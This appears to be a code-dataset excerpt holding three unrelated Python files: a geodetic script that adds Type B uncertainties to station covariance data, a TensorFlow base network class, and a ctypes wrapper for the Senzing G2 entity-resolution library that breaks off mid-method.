content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
#!/usr/bin/env python3
"""This script adds Type B uncertainties to those given in the .apu file.
"""
from sys import exit
from glob import glob
from numpy import matrix
from math import radians, sin, cos, sqrt, atan2, degrees
def dd2dms(dd):
minutes, seconds = divmod(abs(dd) * 3600, 60)
degrees, minutes = divmod(minutes, 60)
dms = degrees + (minutes / 100) + (seconds / 10000)
return dms if dd >= 0 else -dms
def dms2dd(dms):
degmin, seconds = divmod(abs(dms) * 1000, 10)
degrees, minutes = divmod(degmin, 100)
dd = degrees + (minutes / 60) + (seconds / 360)
return dd if dms >= 0 else -dd
def rotation_matrix(lat, lon):
"""Returns the 3x3 rotation matrix for a given latitude and longitude
(given in decimal degrees)
See Section 4.2.3 of the DynaNet User's Guide v3.3
"""
(rlat, rlon) = (radians(lat), radians(lon))
rot_matrix = matrix(
[[-sin(rlon), -sin(rlat)*cos(rlon), cos(rlat)*cos(rlon)],
[cos(rlon), -sin(rlat)*sin(rlon), cos(rlat)*sin(rlon)],
[0.0, cos(rlat), sin(rlat)]]
)
return rot_matrix
def vcv_cart2local(vcv_cart, lat, lon):
"""Transforms a 3x3 VCV from the Cartesian to the local reference frame
See Section 4.4.1 of the DynaNet User's Guide v3.3
"""
rot_matrix = rotation_matrix(lat, lon)
vcv_local = rot_matrix.transpose() * vcv_cart * rot_matrix
return vcv_local
def error_ellipse(vcv):
"""Calculate the semi-major axis, semi-minor axis, and the orientation of
the error ellipse calculated from a 3x3 VCV
See Section 7.3.3.1 of the DynaNet User's Guide v3.3
"""
z = sqrt((vcv[0, 0] - vcv[1, 1])**2 + 4 * vcv[0, 1]**2)
a = sqrt(0.5 * (vcv[0, 0] + vcv[1, 1] + z))
b = sqrt(0.5 * (vcv[0, 0] + vcv[1, 1] - z))
orientation = 90 - degrees(0.5 * atan2((2 * vcv[0, 1]),
(vcv[0, 0] - vcv[1, 1])))
return a, b, orientation
def circ_hz_pu(a, b):
"""Calculate the circularised horizontal PU(95%) from the semi-major and
semi-minor axes
"""
q0 = 1.960790
q1 = 0.004071
q2 = 0.114276
q3 = 0.371625
c = b / a
k = q0 + q1 * c + q2 * c**2 + q3 * c**3
r = a * k
return r
# Determine the files to use
apuFiles = glob('*.apu')
if (len(apuFiles) == 1):
apuFile = apuFiles[0]
elif (len(apuFiles) == 0):
exit('\nThere is no apu file to work on\n')
else:
print('\nThere are multiple apu files:')
i = 0
for apuFile in apuFiles:
i += 1
print('\t' + str(i) + '\t' + apuFile)
fileNum = input('Type the number of the file you want to check: ')
if int(fileNum) < 1 or int(fileNum) > len(apuFiles):
exit('Invalid response. Select a number between 1 and ' +
str(len(apuFiles)))
apuFile = apuFiles[int(fileNum) - 1]
# Set the Type B uncertainties
rvsE = 0.003
rvsN = 0.003
rvsU = 0.006
nonRvsE = 0.006
nonRvsN = 0.006
nonRvsU = 0.012
# Create a list of RVS stations
rvsStations = ['ALBY', 'ALIC_2011201', 'ANDA', 'ARMC', 'ARUB', 'BALA', 'BBOO',
'BDLE', 'BDVL', 'BEEC', 'BING', 'BKNL', 'BNDY', 'BRO1', 'BROC', 'BULA',
'BUR2', 'BURA', 'CEDU', 'CNBN', 'COEN', 'COOB', 'COOL', 'DARW_2003094',
'DODA', 'EDSV', 'ESPA_2016055', 'EXMT', 'FLND', 'FROY', 'GABO', 'GASC',
'HERN', 'HIL1_2006222', 'HNIS', 'HOB2_2004358', 'HUGH', 'HYDN', 'IHOE',
'JAB2_2016065', 'JERV', 'JLCK', 'KALG', 'KARR_2013254', 'KAT1', 'KELN',
'KGIS', 'KILK', 'KMAN', 'LAMB', 'LARR_2011062', 'LIAW', 'LKYA', 'LONA',
'LORD_2014185', 'LURA', 'MAIN', 'MEDO', 'MOBS_2004358', 'MRO1', 'MTCV',
'MTDN', 'MTEM', 'MTMA', 'MULG', 'NBRK', 'NCLF', 'NEBO', 'NHIL', 'NMTN',
'NNOR_2012276', 'NORF', 'NORS', 'NSTA', 'NTJN', 'PARK', 'PERT_2012297',
'PTHL', 'PTKL', 'PTLD_2012123', 'RAVN', 'RKLD', 'RNSP_2015349', 'RSBY',
'SA45', 'SPBY_2011326', 'STNY', 'STR1_2003311', 'SYDN', 'TBOB', 'THEV',
'TID1_2004348', 'TMBO', 'TOMP', 'TOOW', 'TOW2_2011266', 'TURO', 'UCLA',
'WAGN', 'WALH', 'WARA', 'WILU', 'WLAL', 'WMGA', 'WWLG', 'XMIS_2014177',
'YAR2_2013171', 'YEEL', 'YELO_2016082']
# Open output file
fout = open(apuFile + '.typeB', 'w')
# Read in the apu file
apuLines = []
i = 0
with open(apuFile) as f:
for line in f:
if line[:9] == 'Station ':
j = i + 2
apuLines.append(line.rstrip())
i += 1
# Print out the header info
for line in apuLines[:j]:
fout.write(line + '\n')
# Loop over the .apu file and read in the uncertainty info
stations = []
hpLat = {}
hpLon = {}
lat = {}
lon = {}
hPU = {}
vPU = {}
semiMajor = {}
semiMinor = {}
orient = {}
xLine = {}
xVar = {}
xyCoVar = {}
xzCoVar = {}
yLine = {}
yVar = {}
yzCoVar = {}
zLine = {}
zVar = {}
for line in apuLines[j:]:
cols = line.split()
numCols = len(cols)
if numCols == 2:
yLine[station] = line
yVar[station] = float(line[131:150].strip())
yzCoVar[station] = float(line[150:].strip())
elif numCols == 1:
zLine[station] = line
zVar[station] = float(line[150:].strip())
else:
station = line[:20].rstrip()
stations.append(station)
hpLat[station] = float(line[23:36])
hpLon[station] = float(line[38:51])
lat[station] = dms2dd(hpLat[station])
lon[station] = dms2dd(hpLon[station])
hPU[station] = float(line[51:62].strip())
vPU[station] = float(line[62:73].strip())
semiMajor[station] = float(line[73:86].strip())
semiMinor[station] = float(line[86:99].strip())
orient[station] = float(line[99:112].strip())
xLine[station] = line[112:]
xVar[station] = float(line[112:131].strip())
xyCoVar[station] = float(line[131:150].strip())
xzCoVar[station] = float(line[150:].strip())
# Create the full Cartesian VCV from the upper triangular
vcv_cart = {}
for stat in stations:
vcv_cart[stat] = matrix([[xVar[stat], xyCoVar[stat], xzCoVar[stat]],
[xyCoVar[stat], yVar[stat], yzCoVar[stat]],
[xzCoVar[stat], yzCoVar[stat], zVar[stat]]
])
# Loop over all the stations
for stat in stations:
# Transform the XYZ VCV to ENU
vcv_local = vcv_cart2local(vcv_cart[stat], lat[stat], lon[stat])
# Add the Type B uncertainty
if stat in rvsStations:
vcv_local[0, 0] += rvsE**2
vcv_local[1, 1] += rvsN**2
vcv_local[2, 2] += rvsU**2
else:
vcv_local[0, 0] += nonRvsE**2
vcv_local[1, 1] += nonRvsN**2
vcv_local[2, 2] += nonRvsU**2
# Calculate the semi-major axis, semi-minor axis and orientation, and
# convert the orientation from deciaml degrees to HP notation
a, b, orientation = error_ellipse(vcv_local)
orientation = dd2dms(orientation)
# Calculate the PUs
hz_pu = circ_hz_pu(a, b)
vt_pu = 1.96 * sqrt(vcv_local[2, 2])
# Output the uncertainties
line = '{:20}{:>16.9f}{:>15.9f}{:11.4f}{:11.4f}{:13.4f}{:13.4f}{:13.4f}'. \
format(stat, hpLat[stat], hpLon[stat], hz_pu, vt_pu, a, b,
orientation)
line += xLine[stat]
fout.write(line + '\n')
fout.write(yLine[stat] + '\n')
fout.write(zLine[stat] + '\n')
|
python
|
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2018 ZhicongYan
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
import os
import sys
sys.path.append('./')
sys.path.append('../')
from cfgs.networkconfig import get_config
import tensorflow as tf
from tensorflow import layers as tl
import tensorflow.contrib.layers as tcl
import numpy as np
from tensorflow.python import pywrap_tensorflow
from netutils.weightsinit import get_weightsinit
from netutils.activation import get_activation
from netutils.normalization import get_normalization
class BaseNetwork(object):
def __init__(self, config, is_training):
assert('name' in config)
self.name = config['name']
self.is_training = is_training
self.moving_variables_collection = 'BATCH_NORM_MOVING_VARS'
self.using_tcl_library = config.get('use tcl library', False)
self.norm_params = {
'is_training' : self.is_training,
'moving_vars_collection' : self.moving_variables_collection
}
self.config = config
# when first applying the network to input tensor, the reuse is false
self.reuse = False
self.end_points = {}
act_fn = self.config.get('activation', 'relu')
output_act_fn = self.config.get('output_activation', 'none')
has_bias = self.config.get('has bias', True)
conv_has_bias = self.config.get('conv has bias', has_bias)
fc_has_bias = self.config.get('fc has bias', has_bias)
out_has_bias = self.config.get('out has bias', has_bias)
norm_fn = self.config.get('normalization', 'batch_norm')
norm_params = self.norm_params.copy()
norm_params.update(self.config.get('normalization params', {}))
winit_fn = self.config.get('weightsinit', 'xavier')
binit_fn = self.config.get('biasesinit', 'zeros')
padding = self.config.get('padding', 'SAME')
self.conv_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias':conv_has_bias,
}
self.fc_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'has_bias':fc_has_bias,
}
self.deconv_args = {
'norm_fn':norm_fn,
'norm_params':norm_params,
'act_fn':act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias' : conv_has_bias,
}
self.out_conv_args = {
'act_fn':output_act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'padding':padding,
'has_bias' : out_has_bias,
}
self.out_fc_args = {
'act_fn':output_act_fn,
'winit_fn':winit_fn,
'binit_fn':binit_fn,
'has_bias': out_has_bias,
}
def uniform_initializer(self, stdev):
return tf.random_uniform_initializer(-stdev*np.sqrt(3), stdev*np.sqrt(3))
def conv2d(self, name, x, nb_filters, ksize, stride=1, *,
norm_fn='none', norm_params=None, act_fn='none', winit_fn='xavier', binit_fn='zeros', padding='SAME', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'he_uniform':
input_nb_filters = int(x.get_shape()[-1])
fan_in = input_nb_filters * (ksize**2)
fan_out = nb_filters * (ksize**2) / (stride**2)
filters_stdev = np.sqrt(4.0/(fan_in + fan_out))
winit_fn = self.uniform_initializer(filters_stdev)
else:
raise Exception('Error weights initializer function name : ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
_padding = self.config.get(name + ' padding', padding)
if self.using_tcl_library:
x = tcl.conv2d(x, nb_filters, ksize, stride=stride,
activation_fn=act_fn,
normalizer_fn=norm_fn,
normalizer_params=norm_params,
weights_initializer=winit_fn,
padding=_padding,
scope=name)
else:
x = tl.conv2d(x, nb_filters, ksize, strides=stride,
padding=_padding,
use_bias=has_bias,
kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True,
name=name)
with tf.variable_scope(name):
if norm_fn is not None:
norm_params = norm_params or {}
x = norm_fn(x, **norm_params)
if act_fn is not None:
x = act_fn(x)
if disp:
print('\t\tConv2D(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str, _padding))
if collect_end_points:
self.end_points[name] = x
return x
def deconv2d(self, name, x, nb_filters, ksize, stride, *,
norm_fn='none', norm_params=None, act_fn='relu', winit_fn='xavier', binit_fn='zeros', padding='SAME', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'he_uniform':
input_nb_filters = int(x.get_shape()[-1])
fan_in = input_nb_filters * (ksize**2) / (stride**2)
fan_out = nb_filters * (ksize**2)
filters_stdev = np.sqrt(4.0/(fan_in + fan_out))
winit_fn = self.uniform_initializer(filters_stdev)
else:
raise Exception('Error weights initializer function name : ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
_padding = self.config.get(name + ' padding', padding)
if self.using_tcl_library:
x = tcl.conv2d_transpose(x, nb_filters, ksize, stride=stride,
use_bias=True,
activation_fn=act_fn,
normalizer_fn=norm_fn,
normalizer_params=norm_params,
weights_initializer=winit_fn,
padding=_padding,
scope=name)
else:
x = tl.conv2d_transpose(x, nb_filters, ksize, strides=stride,
padding=_padding,
use_bias=has_bias,
kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True, name=name)
with tf.variable_scope(name):
if norm_fn is not None:
norm_params = norm_params or {}
x = norm_fn(x, **norm_params)
if act_fn is not None:
x = act_fn(x)
if disp:
print('\t\tDeonv2D(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str, _padding))
if collect_end_points:
self.end_points[name] = x
return x
def fc(self, name, x, nb_nodes, *,
norm_fn='none', norm_params=None, act_fn='none', winit_fn='xavier', binit_fn='zeros', has_bias=True,
disp=True, collect_end_points=True):
if callable(act_fn):
act_fn_str = 'func'
act_fn = act_fn
else:
act_fn_str = self.config.get(name + ' activation', act_fn)
act_fn = get_activation(act_fn_str)
if callable(norm_fn):
norm_fn_str = 'func'
norm_fn = norm_fn
else:
norm_fn_str = self.config.get(name + ' normalization', norm_fn)
norm_fn = get_normalization(norm_fn_str)
winit_fn_str = self.config.get(name + ' weightsinit', winit_fn)
if 'special' in winit_fn_str:
split = winit_fn_str.split()
winit_name = split[0]
if winit_name == 'glorot_uniform':
input_nb_nodes = int(x.get_shape()[-1])
filters_stdev = np.sqrt(2.0/(input_nb_nodes + nb_nodes))
winit_fn = self.uniform_initializer(filters_stdev)
else:
raise Exception('Error weights initializer function name : ' + winit_fn_str)
else:
winit_fn = get_weightsinit(winit_fn_str)
binit_fn_str = self.config.get(name + ' biasesinit', binit_fn)
binit_fn = get_weightsinit(binit_fn_str)
if self.using_tcl_library:
x = tcl.fully_connected(x, nb_nodes,
activation_fn=act_fn, normalizer_fn=norm_fn, normalizer_params=norm_params,
weights_initializer=winit_fn, scope=name)
else:
x = tl.dense(x, nb_nodes, use_bias=has_bias, kernel_initializer=winit_fn,
bias_initializer=binit_fn,
trainable=True, name=name)
with tf.variable_scope(name):
if norm_fn is not None:
norm_params = norm_params or {}
x = norm_fn(x, **norm_params)
if act_fn is not None:
x = act_fn(x)
if disp:
print('\t\tFC(' + str(name) + ') --> ', x.get_shape(), ' ', (act_fn_str, norm_fn_str, winit_fn_str))
if collect_end_points:
self.end_points[name] = x
return x
def concat(self, name, x_list, disp=True, collect_end_points=True):
x = tf.concat(x_list, axis=3)
if disp:
print('\t\tConcat(' + str(name) + ') --> ', x.get_shape())
if collect_end_points:
self.end_points[name] = x
return x
def maxpool2d(self, name, x, size, stride, padding='SAME', disp=True, collect_end_points=True):
_padding = self.config.get(name + ' padding', padding)
x = tcl.max_pool2d(x, size, stride=stride, padding=_padding, scope=name)
if disp:
print('\t\tMaxPool(' + str(name) + ') --> ', x.get_shape())
if collect_end_points:
self.end_points[name] = x
return x
def upsample2d(self, name, x, size):
# tf.resize_images
pass
def activation(self, x, act_fn='relu'):
if not callable(act_fn):
act_fn = get_activation(act_fn)
return act_fn(x)
def zero_padding2d(self, x, padding):
if isinstance(padding, int):
padding = ((padding, padding), (padding, padding))
elif isinstance(padding, list) or isinstance(padding, tuple) and isinstance(padding[0], int) and isinstance(padding[1], int):
padding = ((padding[0], padding[0]), (padding[1], padding[1]))
else:
raise ValueError('BaseNetwork : padding error')
return tf.spatial_2d_padding(x, padding=padding, data_format='channels_last')
@property
def vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
@property
def trainable_vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name)
@property
def conv_vars(self):
return [var for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) if self.name+'/conv' in var.name]
@property
def top_vars(self):
return [var for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) if self.name+'/fc' in var.name]
@property
def store_vars(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self.name) + tf.get_collection(self.moving_variables_collection, scope=self.name)
@property
def moving_vars(self):
return tf.get_collection(self.moving_variables_collection, scope=self.name)
@property
def all_vars(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=self.name)
@property
def histogram_summary_list(self):
return [tf.summary.histogram(var.name, var) for var in self.store_vars]
def find_pretrained_weights_path(self, weights_filename, throw_not_found_error=False):
model_path = os.path.join('C:\\Models', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('E:\\Models', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('F:\\Models', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('/mnt/data01/models/', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('/mnt/data02/models/', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('/mnt/data03/models/', weights_filename)
if not os.path.exists(model_path):
model_path = os.path.join('/mnt/data04/models/', weights_filename)
if not os.path.exists(model_path):
if throw_not_found_error:
raise ValueError('Base Network : the pretrained weights file ' + weights_filename + ' is not found')
else:
model_path = None
return model_path
def load_pretrained_weights(self, sess):
print('base network load pretrained weights')
return False
def load_pretrained_model_weights(self, sess, cfg, network_name, only_bottom=True):
config_file = get_config(cfg)
asset_filepath = config_file['assets dir']
ckpt_path = os.path.join(asset_filepath, config_file["trainer params"].get("checkpoint dir", "checkpoint"))
ckpt_name = ''
with open(os.path.join(ckpt_path, 'checkpoint'), 'r') as infile:
for line in infile:
if line.startswith('model_checkpoint_path'):
ckpt_name = line[len("model_checkpoint_path: \""):-2]
checkpoint_path = os.path.join(ckpt_path, ckpt_name)
print("Load checkpoint : ", checkpoint_path)
reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path)
var_to_shape_map = reader.get_variable_to_shape_map()
assign_list = []
var_list = self.all_vars
var_dict = {var.name.split(':')[0] : var for var in var_list}
for key in var_to_shape_map:
if key.startswith(network_name):
if only_bottom and 'fc' in key:
continue
var_name = self.name + '/' + key[len(network_name)+1:]
assign_list.append(tf.assign(var_dict[var_name], reader.get_tensor(key)))
assign_op = tf.group(assign_list)
sess.run(assign_op)
return True
|
python
|
from ctypes import *
import threading
import json
import os
tls_var = threading.local()
import csv
csv.field_size_limit(500000)
from G2Exception import TranslateG2ModuleException, G2ModuleNotInitialized, G2ModuleGenericException
def resize_return_buffer(buf_, size_):
""" callback function that resizs return buffer when it is too small
Args:
size_: size the return buffer needs to be
"""
try:
if (sizeof(tls_var.buf) < size_) :
tls_var.buf = create_string_buffer(size_)
except AttributeError:
tls_var.buf = create_string_buffer(size_)
return addressof(tls_var.buf)
class G2Module(object):
"""G2 module access library
Attributes:
_lib_handle: A boolean indicating if we like SPAM or not.
_resize_func_def: resize function definiton
_resize_func: resize function pointer
_module_name: CME module name
_ini_file_name: name and location of .ini file
"""
# flags for exporting entity data
G2_EXPORT_INCLUDE_ALL_ENTITIES = ( 1 << 0 )
G2_EXPORT_CSV_INCLUDE_FULL_DETAILS = ( 1 << 1 )
G2_EXPORT_INCLUDE_RESOLVED = ( 1 << 2 )
G2_EXPORT_INCLUDE_POSSIBLY_SAME = ( 1 << 3 )
G2_EXPORT_INCLUDE_POSSIBLY_RELATED = ( 1 << 4 )
G2_EXPORT_INCLUDE_NAME_ONLY = ( 1 << 5 )
G2_EXPORT_INCLUDE_DISCLOSED = ( 1 << 6 )
# flags for outputting entity feature data
G2_ENTITY_INCLUDE_ALL_FEATURES = ( 1 << 7 )
G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES = ( 1 << 8 )
G2_ENTITY_INCLUDE_SINGLE_FEATURES = ( 1 << 9 )
G2_ENTITY_INCLUDE_NO_FEATURES = ( 1 << 10 )
# flags for finding entity path data
G2_FIND_PATH_PREFER_EXCLUDE = ( 1 << 11 )
# flags for outputting entity relation data
G2_ENTITY_INCLUDE_ALL_RELATIONS = ( 1 << 12 )
G2_ENTITY_INCLUDE_POSSIBLY_SAME_RELATIONS = ( 1 << 13 )
G2_ENTITY_INCLUDE_POSSIBLY_RELATED_RELATIONS = ( 1 << 14 )
G2_ENTITY_INCLUDE_NAME_ONLY_RELATIONS = ( 1 << 15 )
G2_ENTITY_INCLUDE_DISCLOSED_RELATIONS = ( 1 << 16 )
G2_ENTITY_INCLUDE_NO_RELATIONS = ( 1 << 17 )
# flag for getting a minimal entity
G2_ENTITY_MINIMAL_FORMAT = ( 1 << 18 )
# flag for excluding feature scores from search results
G2_SEARCH_NO_FEATURE_SCORES = ( 1 << 19 )
# recommended settings
G2_EXPORT_DEFAULT_FLAGS = G2_EXPORT_INCLUDE_ALL_ENTITIES
G2_ENTITY_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES | G2_ENTITY_INCLUDE_ALL_RELATIONS
G2_FIND_PATH_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES | G2_ENTITY_INCLUDE_ALL_RELATIONS
G2_SEARCH_BY_ATTRIBUTES_DEFAULT_FLAGS = G2_ENTITY_INCLUDE_REPRESENTATIVE_FEATURES
G2_SEARCH_BY_ATTRIBUTES_MINIMAL_STRONG = G2_ENTITY_MINIMAL_FORMAT | G2_SEARCH_NO_FEATURE_SCORES | G2_ENTITY_INCLUDE_NO_RELATIONS | G2_EXPORT_INCLUDE_RESOLVED | G2_EXPORT_INCLUDE_POSSIBLY_SAME
G2_SEARCH_BY_ATTRIBUTES_MINIMAL_ALL = G2_ENTITY_MINIMAL_FORMAT | G2_SEARCH_NO_FEATURE_SCORES | G2_ENTITY_INCLUDE_NO_RELATIONS
# backwards compatability flags
G2_EXPORT_DEFAULT_REPORT_FLAGS = G2_EXPORT_INCLUDE_ALL_ENTITIES
def init(self):
""" Initializes the G2 engine
This should only be called once per process. Currently re-initializing the G2 engin
after a destroy requires unloaded the class loader used to load this class.
Returns:
int: 0 on success
"""
if self._debug:
print("Initializing G2 module")
resize_return_buffer(None, 65535)
p_module_name = self.prepareStringArgument(self._module_name)
p_ini_file_name = self.prepareStringArgument(self._ini_file_name)
self._lib_handle.G2_init.argtypes = [c_char_p, c_char_p, c_int]
retval = self._lib_handle.G2_init(p_module_name,
p_ini_file_name,
self._debug)
if self._debug:
print("Initialization Status: " + str(retval))
if retval == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif retval == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif retval < 0:
raise G2ModuleGenericException("Failed to initialize G2 Module")
return retval
def __init__(self, module_name_, ini_file_name_, debug_=False):
# type: (str, str, bool) -> None
""" G2Module class initialization
Args:
moduleName: A short name given to this instance of the engine
iniFilename: A fully qualified path to the G2 engine INI file (often /opt/senzing/g2/python/G2Module.ini)
verboseLogging: Enable diagnostic logging which will print a massive amount of information to stdout
"""
try:
if os.name == 'nt':
self._lib_handle = cdll.LoadLibrary("G2.dll")
else:
self._lib_handle = cdll.LoadLibrary("libG2.so")
except OSError as ex:
print("ERROR: Unable to load G2. Did you remember to setup your environment by sourcing the setupEnv file?")
print("ERROR: For more information see https://senzing.zendesk.com/hc/en-us/articles/115002408867-Introduction-G2-Quickstart")
print("ERROR: If you are running Ubuntu or Debian please also review the ssl and crypto information at https://senzing.zendesk.com/hc/en-us/articles/115010259947-System-Requirements")
raise G2ModuleGenericException("Failed to load the G2 library")
self._resize_func_def = CFUNCTYPE(c_char_p, c_char_p, c_size_t)
self._resize_func = self._resize_func_def(resize_return_buffer)
self._module_name = module_name_
self._ini_file_name = ini_file_name_
self._debug = debug_
def primeEngine(self):
""" Primes the G2 engine
Return:
None
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_primeEngine.restype = c_int
self._lib_handle.G2_primeEngine.argtypes = []
ret_code = self._lib_handle.G2_primeEngine()
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
def clearLastException(self):
""" Clears the last exception
Return:
None
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_clearLastException.restype = None
self._lib_handle.G2_clearLastException.argtypes = []
self._lib_handle.G2_clearLastException()
def getLastException(self):
""" Gets the last exception
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_getLastException.restype = c_int
self._lib_handle.G2_getLastException.argtypes = [c_char_p, c_size_t]
self._lib_handle.G2_getLastException(tls_var.buf,sizeof(tls_var.buf))
resultString = tls_var.buf.value.decode('utf-8')
return resultString
def getLastExceptionCode(self):
""" Gets the last exception code
"""
resize_return_buffer(None, 65535)
self._lib_handle.G2_getLastExceptionCode.restype = c_int
self._lib_handle.G2_getLastExceptionCode.argtypes = []
exception_code = self._lib_handle.G2_getLastExceptionCode()
return exception_code
def process(self, input_umf_):
# type: (str) -> None
""" Generic process function without return
This method will send a record for processing in g2.
Args:
record: An input record to be processed. Contains the data and control info.
Return:
None
"""
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
input_umf_string = str(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
self._lib_handle.G2_process.argtypes = [c_char_p]
self._lib_handle.G2_process.restype = c_int
ret_code = self._lib_handle.G2_process(input_umf_string)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
elif ret_code < 0:
raise G2ModuleGenericException("ERROR_CODE: " + str(ret_code))
def processWithResponse(self, input_umf_):
""" Generic process function that returns results
This method will send a record for processing in g2. It is a synchronous
call, i.e. it will wait until g2 actually processes the record, and then
optionally return any response message.
Args:
record: An input record to be processed. Contains the data and control info.
response: If there is a response to the message it will be returned here.
Note there are performance benefits of calling the process method
that doesn't need a response message.
Return:
str: The response in G2 JSON format.
"""
# type: (str) -> str
""" resolves an entity synchronously
Args:
input_umf_: G2 style JSON
"""
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
input_umf_string = str(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_processWithResponseResize.argtypes = [c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_processWithResponseResize(input_umf_string,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
raise G2ModuleNotInitialized('G2Module has not been succesfully initialized')
return responseBuf.value.decode('utf-8')
def checkRecord(self, input_umf_, recordQueryList):
# type: (str,str,str) -> str
""" Scores the input record against the specified one
Args:
input_umf_: A JSON document containing the attribute information
for the observation.
dataSourceCode: The data source for the observation.
recordID: The ID for the record
Return:
str: The response in G2 JSON format.
"""
if type(input_umf_) == str:
input_umf_string = input_umf_.encode('utf-8')
elif type(input_umf_) == bytearray:
input_umf_string = str(input_umf_)
else:
input_umf_string = input_umf_
resize_return_buffer(None, 65535)
responseBuf = c_char_p(None)
responseSize = c_size_t(0)
self._lib_handle.G2_checkRecord.argtypes = [c_char_p, c_char_p, POINTER(c_char_p), POINTER(c_size_t), self._resize_func_def]
ret_code = self._lib_handle.G2_checkRecord(input_umf_string,
recordQueryList,
pointer(responseBuf),
pointer(responseSize),
self._resize_func)
if ret_code == -2:
self._lib_handle.G2_getLastException(tls_var.buf, sizeof(tls_var.buf))
raise TranslateG2ModuleException(tls_var.buf.value)
elif ret_code == -1:
